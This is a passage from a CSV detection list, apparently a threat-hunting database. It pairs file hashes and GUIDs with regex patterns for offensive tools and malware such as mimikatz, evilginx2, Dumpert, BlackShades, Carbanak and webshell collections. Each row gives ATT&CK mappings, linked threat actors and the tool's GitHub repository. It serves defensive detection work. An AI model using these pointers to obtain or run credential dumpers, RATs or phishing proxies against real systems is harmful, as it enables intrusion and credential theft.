of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - 
T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","41725" "*e01fee07234e35d11957d7ff65a5e2e7e0bac4a4ff061fd5b5d90a42701c1c49*",".{0,1000}e01fee07234e35d11957d7ff65a5e2e7e0bac4a4ff061fd5b5d90a42701c1c49.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","41726" "*e022c33f7f02b564f42f4ae68edded719b3e4cfdb3ea9ce9de2d07dc1c586321*",".{0,1000}e022c33f7f02b564f42f4ae68edded719b3e4cfdb3ea9ce9de2d07dc1c586321.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","41727" "*e024e14ccb85b8c59cfc10ee2d9aa867c85e036382363fd8581c97ecaaf10fb4*",".{0,1000}e024e14ccb85b8c59cfc10ee2d9aa867c85e036382363fd8581c97ecaaf10fb4.{0,1000}","offensive_tool_keyword","BlackShades","remote access trojan (RAT) used by attackers to gain unauthorized control over a victim's computer","T1012 - T1059.001 - T1071.001 - T1105 - T1113 - T1125","TA0003 - TA0005 - TA0008 - TA0010 - 
TA0011","N/A","N/A","Malware","https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/BlackShades","1","0","#filehash","N/A","10","10","2468","431","2025-04-15T16:14:10Z","2023-09-12T00:41:11Z","41729" "*e0327c1218fd3723e20acc780e20135f41abca35c35e0f97f7eccac265f4f44e*",".{0,1000}e0327c1218fd3723e20acc780e20135f41abca35c35e0f97f7eccac265f4f44e.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#filehash","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","41732" "*e033b98287a6e38f34841095d91ef08af0170a7915e25da341a7b6142756d274*",".{0,1000}e033b98287a6e38f34841095d91ef08af0170a7915e25da341a7b6142756d274.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","41733" "*E0362605-CC11-4CD5-AFF7-B50934438658*",".{0,1000}E0362605\-CC11\-4CD5\-AFF7\-B50934438658.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","41734" "*E0362605-CC11-4CD5-AFF7-B50934438658*",".{0,1000}E0362605\-CC11\-4CD5\-AFF7\-B50934438658.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows 
credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","#GUIDproject","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","41735" "*e0477338261831c6830884650d12f079a5a473547f5c76f70ecc2518aae62901*",".{0,1000}e0477338261831c6830884650d12f079a5a473547f5c76f70ecc2518aae62901.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","41736" "*E049487C-C5BD-471E-99AE-C756E70B6520*",".{0,1000}E049487C\-C5BD\-471E\-99AE\-C756E70B6520.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz GUID project","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#GUIDproject","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41737" 
"*e04c023e1ff561f7bdfaef366050533bf3f6e0a06675112911403fc5d3fafb71*",".{0,1000}e04c023e1ff561f7bdfaef366050533bf3f6e0a06675112911403fc5d3fafb71.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","41738" "*e04db985cc121db070da15582404750b26819e09e96a4a1026613ae25e034f73*",".{0,1000}e04db985cc121db070da15582404750b26819e09e96a4a1026613ae25e034f73.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","41739" "*e0525b4fd45c8a2c37b577f0609c43d626b2d9837befa03096ebc60f6c52ff25*",".{0,1000}e0525b4fd45c8a2c37b577f0609c43d626b2d9837befa03096ebc60f6c52ff25.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","41741" "*e0527306862820f76f0d843e93c1a19925697a7f2377b41377cbe99031549920*",".{0,1000}e0527306862820f76f0d843e93c1a19925697a7f2377b41377cbe99031549920.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","41742" "*e05b1fa26c9571a7c6111e64a5d710f7bd03fa9795ac68a5f405ba3ac99503e5*",".{0,1000}e05b1fa26c9571a7c6111e64a5d710f7bd03fa9795ac68a5f405ba3ac99503e5.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","41744" "*e05dfa6b3fc5b59044f4b18ba455d751c5a18948d1d0a032d3a11fb753659faa*",".{0,1000}e05dfa6b3fc5b59044f4b18ba455d751c5a18948d1d0a032d3a11fb753659faa.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","41745" "*e05ef2747f973d6ae9e4bd5fbeede55b27afd44882b83b4aee79330e856757e8*",".{0,1000}e05ef2747f973d6ae9e4bd5fbeede55b27afd44882b83b4aee79330e856757e8.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","41746" "*e06104b2d8e8ba207a916352e2f49e4d03f6b0c3bb04d5703e71037ff279ec4d*",".{0,1000}e06104b2d8e8ba207a916352e2f49e4d03f6b0c3bb04d5703e71037ff279ec4d.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","41747" 
"*e064a38f4cb8dbe91f3be32c1b2e925c40ceff78ce299bd1e6cf77339def978a*",".{0,1000}e064a38f4cb8dbe91f3be32c1b2e925c40ceff78ce299bd1e6cf77339def978a.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","41748" "*e066fd26097862651947220c02240ca24faceb5f4ca0d1279881d97f7cff2c17*",".{0,1000}e066fd26097862651947220c02240ca24faceb5f4ca0d1279881d97f7cff2c17.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41749" "*E0695F0F-0FAF-44BC-AE55-A1FCBFE70271*",".{0,1000}E0695F0F\-0FAF\-44BC\-AE55\-A1FCBFE70271.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","41750" "*e06ff243f2101ea3fd1ff5f69109896d56776bd5d92d62e5607f12c693ece5e7*",".{0,1000}e06ff243f2101ea3fd1ff5f69109896d56776bd5d92d62e5607f12c693ece5e7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41752" "*e070581ad8dc1ca4c1ed0a4372622a03f807fda24a7cf4856e77382c8ce43c4e*",".{0,1000}e070581ad8dc1ca4c1ed0a4372622a03f807fda24a7cf4856e77382c8ce43c4e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","41753" "*e07330a2c8c8678fce26c761437a3ed5cf38881baea403a376a5b3b9b5ef9d27*",".{0,1000}e07330a2c8c8678fce26c761437a3ed5cf38881baea403a376a5b3b9b5ef9d27.{0,1000}","offensive_tool_keyword","ACEshark","uncover potential privilege escalation vectors by analyzing windows service configurations and Access Control Entries","T1058 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/t3l3machus/ACEshark","1","0","#filehash","N/A","6","2","109","19","2025-01-15T07:01:48Z","2024-12-28T10:42:29Z","41755" 
"*e0745223bdd96223cc512234545e517028d410e462bfa265f4c09b8e3740a44a*",".{0,1000}e0745223bdd96223cc512234545e517028d410e462bfa265f4c09b8e3740a44a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41756" "*e075c5a3c998e450c06b2e27ac2904ac2377b6d724577c5071437b68d6b3238b*",".{0,1000}e075c5a3c998e450c06b2e27ac2904ac2377b6d724577c5071437b68d6b3238b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41757" "*e07eba4d775523eedeb78938ddad86e13e409ce0d15c235e81a02f5bbb0124d7*",".{0,1000}e07eba4d775523eedeb78938ddad86e13e409ce0d15c235e81a02f5bbb0124d7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41759" "*e080a9a96cea5b322687be0113ce158715ba988532e3800d37a8690767c0d22e*",".{0,1000}e080a9a96cea5b322687be0113ce158715ba988532e3800d37a8690767c0d22e.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","41760" "*e0813810d26e45cd005e675ec628615fa9b6ba8b3c55ce002a74a8ebe143d133*",".{0,1000}e0813810d26e45cd005e675ec628615fa9b6ba8b3c55ce002a74a8ebe143d133.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","41761" "*e084636dbb198247674ec5cf50646a01ff95b16ed6cf81c5a841062d14657a7e*",".{0,1000}e084636dbb198247674ec5cf50646a01ff95b16ed6cf81c5a841062d14657a7e.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","41762" "*E08BAA9C-9D20-4C9A-8933-EC567F39F54C*",".{0,1000}E08BAA9C\-9D20\-4C9A\-8933\-EC567F39F54C.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#GUIDproject","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","41764" "*e090e512d904f56de3f88655cd846ef48fb4d6ed5fedd1f452225c1917f5e352*",".{0,1000}e090e512d904f56de3f88655cd846ef48fb4d6ed5fedd1f452225c1917f5e352.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","41765" "*e094dc2a9ec5fe9800948a640f416fe610fdf155874e897d3cba6cc86f854083*",".{0,1000}e094dc2a9ec5fe9800948a640f416fe610fdf155874e897d3cba6cc86f854083.{0,1000}","offensive_tool_keyword","evilginx2","Standalone 
man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","41766" "*E09F4899-D8B3-4282-9E3A-B20EE9A3D463*",".{0,1000}E09F4899\-D8B3\-4282\-9E3A\-B20EE9A3D463.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","0","#GUIDproject","N/A","8","2","145","29","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z","41768" "*e0b25ed05fbe4558e26b270038d41c1de91ecde35d03520a2f20aaab7eee37e3*",".{0,1000}e0b25ed05fbe4558e26b270038d41c1de91ecde35d03520a2f20aaab7eee37e3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41770" "*e0bca03ae086a2ada8a29930036efe3ba12961a2ee71f2ec72cf9bd57096f604*",".{0,1000}e0bca03ae086a2ada8a29930036efe3ba12961a2ee71f2ec72cf9bd57096f604.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41773" "*e0bd65efa57344f0651829271be0eb5187290fcd27004c5ed95081009db434eb*",".{0,1000}e0bd65efa57344f0651829271be0eb5187290fcd27004c5ed95081009db434eb.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","41774" "*e0c11846a94a3d0f93fa381c38677902b6727bc150944b643c52b51f171787fb*",".{0,1000}e0c11846a94a3d0f93fa381c38677902b6727bc150944b643c52b51f171787fb.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. 
Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","41776" "*e0c20aa0ef6e4fd5cd5cabde2f89d64d4fe1c73d13cc1ed58e401bf5e0667754*",".{0,1000}e0c20aa0ef6e4fd5cd5cabde2f89d64d4fe1c73d13cc1ed58e401bf5e0667754.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41777" "*e0c9c27432a110f23a520ee1dad769a42f933062041df41cf88597fce97df008*",".{0,1000}e0c9c27432a110f23a520ee1dad769a42f933062041df41cf88597fce97df008.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","41778" 
"*e0cc8936e11dcf4e016ff32f5a81aa15f352cb71ec8a24b383dc263e56425018*",".{0,1000}e0cc8936e11dcf4e016ff32f5a81aa15f352cb71ec8a24b383dc263e56425018.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","41779" "*e0cfde420c63408cdb09819c3d98d0e96356ebdab6389d08fe695846d51b3f9b*",".{0,1000}e0cfde420c63408cdb09819c3d98d0e96356ebdab6389d08fe695846d51b3f9b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41780" "*e0d5171c6951b726230f5f811f202c3a15b3fff10aa44547821e29d3b13cc140*",".{0,1000}e0d5171c6951b726230f5f811f202c3a15b3fff10aa44547821e29d3b13cc140.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41781" "*e0dc49ab46ab388ae93213602843e135bae218d15f17fc74bdc56de38fe5d6cc*",".{0,1000}e0dc49ab46ab388ae93213602843e135bae218d15f17fc74bdc56de38fe5d6cc.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","41784" "*e0deeac091f3f0ed861e2c11d65fdb8e064bee75fd6867ef40b266e8f5c12f86*",".{0,1000}e0deeac091f3f0ed861e2c11d65fdb8e064bee75fd6867ef40b266e8f5c12f86.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","41786" 